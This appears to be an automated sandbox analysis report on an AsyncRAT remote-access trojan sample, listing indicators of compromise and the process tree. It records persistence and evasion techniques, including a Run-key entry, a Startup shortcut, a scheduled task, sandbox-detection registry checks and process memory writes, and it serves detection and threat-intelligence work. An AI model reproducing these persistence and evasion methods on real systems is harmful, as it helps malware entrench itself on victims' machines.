asyncrat | 6020eb188059a9b681b03092198c2d243a8e5ea5040b1d00d5809f56b4276c0d

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\Control Panel\International\Geo\Nation	Payload.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payload.lnk	Payload.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payload.lnk	Payload.exe

Executes dropped EXE 19 IoCs

pid	Process
4020	Payload.exe
4604	Stupido.exe
1060	Payload.exe
3012	Payload.exe
1604	Payload.exe
5100	Payload.exe
1532	Payload.exe
2172	Payload.exe
4532	Payload.exe
2656	Payload.exe
2280	Payload.exe
1060	Payload.exe
2404	Payload.exe
2032	Payload.exe
180	Payload.exe
4704	Payload.exe
1208	Payload.exe
1228	Payload.exe
844	Payload.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Payload = "C:\\Users\\Admin\\AppData\\Roaming\\Payload.exe"	Payload.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\A:	svchost.exe
File opened (read-only)	\??\B:	svchost.exe
File opened (read-only)	\??\H:	svchost.exe
File opened (read-only)	\??\S:	svchost.exe
File opened (read-only)	\??\U:	svchost.exe
File opened (read-only)	\??\V:	svchost.exe
File opened (read-only)	\??\D:	Payload.exe
File opened (read-only)	\??\O:	svchost.exe
File opened (read-only)	\??\X:	svchost.exe
File opened (read-only)	\??\P:	svchost.exe
File opened (read-only)	\??\Q:	svchost.exe
File opened (read-only)	\??\E:	svchost.exe
File opened (read-only)	\??\G:	svchost.exe
File opened (read-only)	\??\I:	svchost.exe
File opened (read-only)	\??\L:	svchost.exe
File opened (read-only)	\??\M:	svchost.exe
File opened (read-only)	\??\N:	svchost.exe
File opened (read-only)	\??\W:	svchost.exe
File opened (read-only)	\??\Y:	svchost.exe
File opened (read-only)	\??\J:	svchost.exe
File opened (read-only)	\??\K:	svchost.exe
File opened (read-only)	\??\R:	svchost.exe
File opened (read-only)	\??\T:	svchost.exe
File opened (read-only)	\??\Z:	svchost.exe

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Payload	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	svchost.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
5032	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 6 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\83062dc3_0	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\83062dc3_0\ = "{2}.\\\\?\\hdaudio#func_01&ven_1af4&dev_0022&subsys_1af40022&rev_1001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\\elineouttopo/00010001\|\\Device\\HarddiskVolume2\\Users\\Admin\\AppData\\Local\\Temp\\Payload.exe%b{00000000-0000-0000-0000-000000000000}"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\83062dc3_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\83062dc3_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\3 = 04000000000000000000803f000000000000000000000000	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\83062dc3_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\4 = 0420000000000000180000000000000000000000000000000000803f0000803f	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\83062dc3_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\5 = 0b0000000000000000000000000000000000000000000000	svchost.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe

Modifies registry class 27 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133649356973903464"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PTT = "133649357141074860"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133645876002653112"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\PCT = "133645876006871730"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133649356993122455"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\ICT = "133645876009371909"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PCT = "133649356471926827"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133649357198105865"	svchost.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
1600	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2944	powershell.exe
2944	powershell.exe
1388	powershell.exe
1388	powershell.exe
1388	powershell.exe
4784	powershell.exe
4784	powershell.exe
4784	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4784	powershell.exe
4784	powershell.exe
4784	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
1776	powershell.exe
1776	powershell.exe
1776	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
512	powershell.exe
512	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
512	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3432	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2944	powershell.exe
Token: SeDebugPrivilege	1388	powershell.exe
Token: SeDebugPrivilege	4784	powershell.exe
Token: SeIncreaseQuotaPrivilege	4784	powershell.exe
Token: SeSecurityPrivilege	4784	powershell.exe
Token: SeTakeOwnershipPrivilege	4784	powershell.exe
Token: SeLoadDriverPrivilege	4784	powershell.exe
Token: SeSystemProfilePrivilege	4784	powershell.exe
Token: SeSystemtimePrivilege	4784	powershell.exe
Token: SeProfSingleProcessPrivilege	4784	powershell.exe
Token: SeIncBasePriorityPrivilege	4784	powershell.exe
Token: SeCreatePagefilePrivilege	4784	powershell.exe
Token: SeBackupPrivilege	4784	powershell.exe
Token: SeRestorePrivilege	4784	powershell.exe
Token: SeShutdownPrivilege	4784	powershell.exe
Token: SeDebugPrivilege	4784	powershell.exe
Token: SeSystemEnvironmentPrivilege	4784	powershell.exe
Token: SeRemoteShutdownPrivilege	4784	powershell.exe
Token: SeUndockPrivilege	4784	powershell.exe
Token: SeManageVolumePrivilege	4784	powershell.exe
Token: 33	4784	powershell.exe
Token: 34	4784	powershell.exe
Token: 35	4784	powershell.exe
Token: 36	4784	powershell.exe
Token: SeIncreaseQuotaPrivilege	4784	powershell.exe
Token: SeSecurityPrivilege	4784	powershell.exe
Token: SeTakeOwnershipPrivilege	4784	powershell.exe
Token: SeLoadDriverPrivilege	4784	powershell.exe
Token: SeSystemProfilePrivilege	4784	powershell.exe
Token: SeSystemtimePrivilege	4784	powershell.exe
Token: SeProfSingleProcessPrivilege	4784	powershell.exe
Token: SeIncBasePriorityPrivilege	4784	powershell.exe
Token: SeCreatePagefilePrivilege	4784	powershell.exe
Token: SeBackupPrivilege	4784	powershell.exe
Token: SeRestorePrivilege	4784	powershell.exe
Token: SeShutdownPrivilege	4784	powershell.exe
Token: SeDebugPrivilege	4784	powershell.exe
Token: SeSystemEnvironmentPrivilege	4784	powershell.exe
Token: SeRemoteShutdownPrivilege	4784	powershell.exe
Token: SeUndockPrivilege	4784	powershell.exe
Token: SeManageVolumePrivilege	4784	powershell.exe
Token: 33	4784	powershell.exe
Token: 34	4784	powershell.exe
Token: 35	4784	powershell.exe
Token: 36	4784	powershell.exe
Token: SeIncreaseQuotaPrivilege	4784	powershell.exe
Token: SeSecurityPrivilege	4784	powershell.exe
Token: SeTakeOwnershipPrivilege	4784	powershell.exe
Token: SeLoadDriverPrivilege	4784	powershell.exe
Token: SeSystemProfilePrivilege	4784	powershell.exe
Token: SeSystemtimePrivilege	4784	powershell.exe
Token: SeProfSingleProcessPrivilege	4784	powershell.exe
Token: SeIncBasePriorityPrivilege	4784	powershell.exe
Token: SeCreatePagefilePrivilege	4784	powershell.exe
Token: SeBackupPrivilege	4784	powershell.exe
Token: SeRestorePrivilege	4784	powershell.exe
Token: SeShutdownPrivilege	4784	powershell.exe
Token: SeDebugPrivilege	4784	powershell.exe
Token: SeSystemEnvironmentPrivilege	4784	powershell.exe
Token: SeRemoteShutdownPrivilege	4784	powershell.exe
Token: SeUndockPrivilege	4784	powershell.exe
Token: SeManageVolumePrivilege	4784	powershell.exe
Token: 33	4784	powershell.exe
Token: 34	4784	powershell.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
4020	Payload.exe
4020	Payload.exe
4020	Payload.exe
4020	Payload.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4020	Payload.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2544 wrote to memory of 3416	2544	cmd.exe	90
PID 2544 wrote to memory of 3416	2544	cmd.exe	90
PID 3416 wrote to memory of 2944	3416	cmd.exe	91
PID 3416 wrote to memory of 2944	3416	cmd.exe	91
PID 2944 wrote to memory of 3932	2944	powershell.exe	96
PID 2944 wrote to memory of 3932	2944	powershell.exe	96
PID 3932 wrote to memory of 1940	3932	cmd.exe	98
PID 3932 wrote to memory of 1940	3932	cmd.exe	98
PID 3932 wrote to memory of 1388	3932	cmd.exe	99
PID 3932 wrote to memory of 1388	3932	cmd.exe	99
PID 1388 wrote to memory of 4784	1388	powershell.exe	101
PID 1388 wrote to memory of 4784	1388	powershell.exe	101
PID 1388 wrote to memory of 4692	1388	powershell.exe	112
PID 1388 wrote to memory of 4692	1388	powershell.exe	112
PID 4692 wrote to memory of 4412	4692	WScript.exe	105
PID 4692 wrote to memory of 4412	4692	WScript.exe	105
PID 4412 wrote to memory of 3112	4412	cmd.exe	107
PID 4412 wrote to memory of 3112	4412	cmd.exe	107
PID 4412 wrote to memory of 4656	4412	cmd.exe	108
PID 4412 wrote to memory of 4656	4412	cmd.exe	108
PID 4656 wrote to memory of 3432	4656	powershell.exe	56
PID 4656 wrote to memory of 2060	4656	powershell.exe	37
PID 4656 wrote to memory of 3344	4656	powershell.exe	55
PID 4656 wrote to memory of 1564	4656	powershell.exe	27
PID 4656 wrote to memory of 1760	4656	powershell.exe	30
PID 4656 wrote to memory of 4512	4656	powershell.exe	66
PID 4656 wrote to memory of 2344	4656	powershell.exe	41
PID 4656 wrote to memory of 1156	4656	powershell.exe	19
PID 4656 wrote to memory of 952	4656	powershell.exe	12
PID 4656 wrote to memory of 1148	4656	powershell.exe	18
PID 4656 wrote to memory of 2328	4656	powershell.exe	40
PID 4656 wrote to memory of 748	4656	powershell.exe	14
PID 4656 wrote to memory of 1720	4656	powershell.exe	36
PID 4656 wrote to memory of 1324	4656	powershell.exe	22
PID 4656 wrote to memory of 2292	4656	powershell.exe	39
PID 4656 wrote to memory of 1700	4656	powershell.exe	29
PID 4656 wrote to memory of 2484	4656	powershell.exe	72
PID 4656 wrote to memory of 1104	4656	powershell.exe	17
PID 4656 wrote to memory of 1692	4656	powershell.exe	35
PID 4656 wrote to memory of 1492	4656	powershell.exe	26
PID 4656 wrote to memory of 900	4656	powershell.exe	11
PID 4656 wrote to memory of 2868	4656	powershell.exe	52
PID 4656 wrote to memory of 3852	4656	powershell.exe	69
PID 4656 wrote to memory of 1480	4656	powershell.exe	25
PID 4656 wrote to memory of 1872	4656	powershell.exe	32
PID 4656 wrote to memory of 1868	4656	powershell.exe	75
PID 4656 wrote to memory of 1272	4656	powershell.exe	20
PID 4656 wrote to memory of 1664	4656	powershell.exe	28
PID 4656 wrote to memory of 1464	4656	powershell.exe	24
PID 4656 wrote to memory of 2840	4656	powershell.exe	50
PID 4656 wrote to memory of 3812	4656	powershell.exe	68
PID 4656 wrote to memory of 3220	4656	powershell.exe	65
PID 4656 wrote to memory of 1292	4656	powershell.exe	21
PID 4656 wrote to memory of 1032	4656	powershell.exe	16
PID 4656 wrote to memory of 2804	4656	powershell.exe	48
PID 4656 wrote to memory of 2008	4656	powershell.exe	34
PID 4656 wrote to memory of 3976	4656	powershell.exe	82
PID 4656 wrote to memory of 2000	4656	powershell.exe	33
PID 4656 wrote to memory of 2588	4656	powershell.exe	45
PID 4656 wrote to memory of 1404	4656	powershell.exe	23
PID 4656 wrote to memory of 1012	4656	powershell.exe	15
PID 4656 wrote to memory of 3568	4656	powershell.exe	57
PID 4656 wrote to memory of 2556	4656	powershell.exe	42
PID 4656 wrote to memory of 2580	4656	powershell.exe	44

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
1⤵
- Checks processor information in registry
- Modifies registry class
PID:788
- C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  2⤵
  PID:2572

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
1⤵
PID:900

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:748

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1⤵
PID:1012

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1104
- C:\Users\Admin\AppData\Roaming\Payload.exe
  C:\Users\Admin\AppData\Roaming\Payload.exe
  2⤵
  - Executes dropped EXE
  PID:1060
- C:\Users\Admin\AppData\Roaming\Payload.exe
  C:\Users\Admin\AppData\Roaming\Payload.exe
  2⤵
  - Executes dropped EXE
  PID:3012
- C:\Users\Admin\AppData\Roaming\Payload.exe
  C:\Users\Admin\AppData\Roaming\Payload.exe
  2⤵
  - Executes dropped EXE
  PID:1604
- C:\Users\Admin\AppData\Roaming\Payload.exe
  C:\Users\Admin\AppData\Roaming\Payload.exe
  2⤵
  - Executes dropped EXE
  PID:5100
- C:\Users\Admin\AppData\Roaming\Payload.exe
  C:\Users\Admin\AppData\Roaming\Payload.exe
  2⤵
  - Executes dropped EXE
  PID:1532
- C:\Users\Admin\AppData\Roaming\Payload.exe
  C:\Users\Admin\AppData\Roaming\Payload.exe
  2⤵
  - Executes dropped EXE
  PID:2172
- C:\Users\Admin\AppData\Roaming\Payload.exe
  C:\Users\Admin\AppData\Roaming\Payload.exe
  2⤵
  - Executes dropped EXE
  PID:4532
- C:\Users\Admin\AppData\Roaming\Payload.exe
  C:\Users\Admin\AppData\Roaming\Payload.exe
  2⤵
  - Executes dropped EXE
  PID:2656
- C:\Users\Admin\AppData\Roaming\Payload.exe
  C:\Users\Admin\AppData\Roaming\Payload.exe
  2⤵
  - Executes dropped EXE
  PID:2280
- C:\Users\Admin\AppData\Roaming\Payload.exe
  C:\Users\Admin\AppData\Roaming\Payload.exe
  2⤵
  - Executes dropped EXE
  PID:1060
- C:\Users\Admin\AppData\Roaming\Payload.exe
  C:\Users\Admin\AppData\Roaming\Payload.exe
  2⤵
  - Executes dropped EXE
  PID:2404
- C:\Users\Admin\AppData\Roaming\Payload.exe
  C:\Users\Admin\AppData\Roaming\Payload.exe
  2⤵
  - Executes dropped EXE
  PID:2032
- C:\Users\Admin\AppData\Roaming\Payload.exe
  C:\Users\Admin\AppData\Roaming\Payload.exe
  2⤵
  - Executes dropped EXE
  PID:180
- C:\Users\Admin\AppData\Roaming\Payload.exe
  C:\Users\Admin\AppData\Roaming\Payload.exe
  2⤵
  - Executes dropped EXE
  PID:4704
- C:\Users\Admin\AppData\Roaming\Payload.exe
  C:\Users\Admin\AppData\Roaming\Payload.exe
  2⤵
  - Executes dropped EXE
  PID:1208
- C:\Users\Admin\AppData\Roaming\Payload.exe
  C:\Users\Admin\AppData\Roaming\Payload.exe
  2⤵
  - Executes dropped EXE
  PID:1228
- C:\Users\Admin\AppData\Roaming\Payload.exe
  C:\Users\Admin\AppData\Roaming\Payload.exe
  2⤵
  - Executes dropped EXE
  PID:844

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1148

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1156

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1272

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1324

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1480

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1492

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1564

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1664

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1700

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1760

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1784

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
- Modifies Internet Explorer settings
PID:1872
- C:\Windows\system32\AUDIODG.EXE
  C:\Windows\system32\AUDIODG.EXE 0x508 0x4ec
  2⤵
  PID:3920

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:2008

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:1720

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
1⤵
PID:2292

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
